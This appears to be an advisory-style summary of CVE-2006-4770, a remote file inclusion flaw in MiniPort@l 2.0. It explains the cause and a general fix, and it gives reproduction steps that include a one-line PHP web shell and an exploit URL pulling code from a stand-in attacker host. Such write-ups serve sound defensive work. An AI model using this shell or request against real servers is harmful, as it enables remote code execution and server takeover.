CVE-2006-4770

An attacker sends a crafted HTTP GET request to `dodatki/menu.php` with the `skiny` parameter set to a URL pointing to a remote PHP shell (e.g., `http://evil.com/cmd.txt`). The vulnerable script includes the remote file, executing its PHP code on the target server. The exploit script demonstrates this by appending `?&cmd=` to pass commands to the injected shell [ref_id=1]. No authentication is required, and the attack is performed over HTTP.

The vulnerable file is `dodatki/menu.php` in MiniPort@l 2.0 and earlier. The `skiny` parameter is taken directly from the HTTP request and used in a PHP include/require statement without sanitization, allowing a remote attacker to supply a URL instead of a local file path [ref_id=1].

No patch is included in the bundle. The advisory does not specify a fix, but the vulnerability class (remote file inclusion) is typically remediated by validating that the `skiny` parameter contains only an expected local path, not a URL, and by disabling `allow_url_include` in PHP configuration. Without a published patch, users should upgrade to a version beyond 2.0 or apply input validation manually.

1. Prepare a remote PHP shell file (e.g., `cmd.txt` containing `<?passthru($_GET[cmd]);?>`) and host it on an attacker-controlled web server. 2. Send a GET request to the target: `http://target/MiniPort@l/dodatki/menu.php?skiny=http://attacker/cmd.txt?&cmd=id`. 3. The output of the `id` command will appear in the HTTP response, confirming remote code execution [ref_id=1].